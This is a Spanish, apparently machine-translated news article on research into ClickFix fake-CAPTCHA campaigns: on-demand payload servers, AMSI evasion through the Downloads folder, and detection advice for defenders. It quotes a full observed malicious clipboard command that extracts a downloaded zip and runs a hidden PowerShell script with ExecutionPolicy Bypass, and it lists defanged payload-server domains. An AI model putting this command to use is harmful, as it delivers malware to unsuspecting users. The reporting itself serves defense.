
ClickFix está haciendo crecer secretamente las oficinas administrativas con trucos que engañan a las personas para que ejecuten malware manualmente.
Según un nuevo estudio, los comandos maliciosos detrás de las páginas falsas de «demuestra que eres humano» fueron distribuidos por un servidor basado en API que entregaba a cada visitante el mismo malware con un disfraz diferente. La misma investigación también descubrió un nuevo método de entrega creado para evadir el análisis de scripts de Windows.
El investigador de seguridad Bert-Jan Pals desmontó varias plataformas ClickFix y analizó aproximadamente 3000 cargas útiles de campañas en vivo. Presentó sus hallazgos en la OrangeCon a principios de junio e hizo públicos los detalles el 30 de junio.
ClickFix tiene un diseño simple. Una página con trampa explosiva mostrará un CAPTCHA falso o un error, JavaScript oculto colocará un comando en el portapapeles y la página le indicará que presione una combinación de teclas para pegar y presione Enter. Tú eres quien ejecuta el malware.
Los controles tradicionales de correo electrónico y terminales detectan menos porque el exploit generalmente no está presente en el primer paso y, a menudo, no hay archivos que los programas antivirus tradicionales marquen.
Esto funciona lo suficientemente bien como para que ESET mida un aumento del 517% desde finales de 2024 hasta principios de 2025, y el Informe de Defensa Digital 2025 de Microsoft afirma que el 47% de los casos de acceso temprano vistos por el equipo de expertos en defensa de la compañía incluyen esta característica.
Esta tecnología tiene actualmente su propia entrada en MITRE ATT&CK, T1204.004.
Carga útil a medida
La parte nueva es cómo se genera la carga útil. Pals descubrió que la página recibe comandos de un servidor backend que actúa como un servicio bajo demanda. La página recibe la solicitud, verifica el token de acceso, registra a la persona que llama y devuelve un comando recién codificado cada vez.
Solicitó 100 cargas útiles de un servidor y obtuvo 100 cargas útiles diferentes envueltas en una combinación rotativa de Base64, AES, TripleDES, Rijndael y Deflate. Quitamos el envoltorio y, al menos por ahora, todos se descomprimen en el mismo script y se ejecutan en la memoria a través del espacio de ejecución de PowerShell.
El disfraz es desechable. Si bien el malware subyacente no lo hace, Pals advierte que la carga principal probablemente comenzará a cambiar pronto según cada víctima. La misma plataforma ofrece señuelos en 25 idiomas y combina comandos con el sistema operativo del visitante, con la versión macOS ejecutándose junto con Windows.

La etiqueta «como servicio» es más que una simple marca. ESET está rastreando a los delincuentes que venden constructores ClickFix disponibles en el mercado a otros atacantes. Pals ha descubierto que se puede comercializar en paralelo a un nivel más profundo en el que cada carga útil se produce en masa según demanda.
Un método más silencioso: usar la carpeta Descargas
El segundo descubrimiento es una respuesta directa a los defensores que monitorean los portapapeles. En lugar de copiar un comando malicioso, la nueva página copia un comando de apariencia benigna.

Esta página descarga silenciosamente el archivo a su carpeta de descargas, el portapapeles lo mueve, lo descomprime y obtiene una breve línea de «orquestador» que ejecuta el script en su interior. Debido a que la línea pegada es solo ese orquestador y no la carga útil en sí, está diseñada para pasar a través de AMSI, una característica de Windows que permite el análisis antivirus de los scripts antes de que se ejecuten. El código malicioso se encuentra al lado del archivo descargado. La línea del portapapeles observada tenía este aspecto:
powershell -C «$t=$env:TMP;Move-Item \»$HOME\Downloads\tmp.zip\» \»$t\7947.zip\»;tar -xf \»$t\7947.zip\» -C \»$t\»;conhost –headless powershell -ExecutionPolicy Bypass -File \»$t\tmp.ps1\» # \»* No lo soy un robot ID de verificación reCAPTCHA: 7947 *\»»
Las ejecuciones también se están volviendo sigilosas. La Seducción 2024 original te decía que presionaras Windows + R (Ejecutar) y lo pegaras en el cuadro. La nueva versión, común de 2025 a 2026, se referirá a Windows+X y Windows Terminal. Usar Terminal es más común y, a diferencia del cuadro (Ejecutar), no deja rastro en la clave de registro RunMRU que los investigadores suelen verificar.
ClickFix dejó de ser una herramienta exclusiva para delincuentes hace un tiempo. Proofpoint vinculó a grupos patrocinados por estados en Rusia, Irán y Corea del Norte, incluidos APT28, MuddyWater y Kimsuky, con una campaña que incorporó ClickFix a las cadenas de infección existentes, y el equipo norcoreano creó una versión del trabajo falso «ClickFake Interview» para atacar a los trabajadores criptográficos.
Este truco resultó en parientes nombrados como FileFix y DownloadFix que dependen de otras herramientas confiables de Windows. Esta escala tampoco es teórica. La empresa de seguridad Expel ha descubierto una ola ClearFake que puede haber infectado hasta 147.521 sistemas desde finales de agosto de 2025.
Lo que deberían ver los defensores
Las lecciones defensivas no han cambiado. Hay detalles. La señal confiable es la cadena de proceso, no el texto del portapapeles. explorer.exe o Windows Terminal.exe inicia powershell.exe, cmd.exe o msiexec.exe y se conecta inmediatamente a la red.
Estos son los lanzadores más populares según los datos de Pals, con PowerShell y cmd empatados en aproximadamente un 39% cada uno, y msiexec muy cerca con un 34%.
El EDR de comportamiento, las reglas de control de aplicaciones que restringen qué programas pueden llamar al intérprete de script y una guía de usuario fácil de entender («Nunca pegue un comando que le indiquen que ejecute en el cuadro de ejecución o en la terminal») todavía están vigentes. El uso del método de la carpeta de descarga agrega una cosa más para rastrear. Es una frase de apariencia inofensiva que accede a su carpeta de descargas y genera un PowerShell oculto.
Pals también enumeró tres servidores de carga útil observados durante la investigación.
Comic Star (.) Rat Baby Bon (.) CFD Mercantaro Roll (.) Asia
Conectarse a cualquiera de estos no prueba infección. Esto significa que el comando probablemente se colocó en el portapapeles de alguien.
El veredicto de Pals sobre esta tecnología es sencillo: «ClickFix llegó para quedarse». El patrón general de su investigación es que ClickFix migra en el momento en que los defensores se ponen al día, y el paso de scripts únicos a servidores de carga útil bajo demanda mantiene bajo el costo de repetir su adaptación.
Lo siguiente que hay que observar es si el malware en sí, y no sólo el envoltorio, comienza a cambiar de una víctima a otra.
Source link
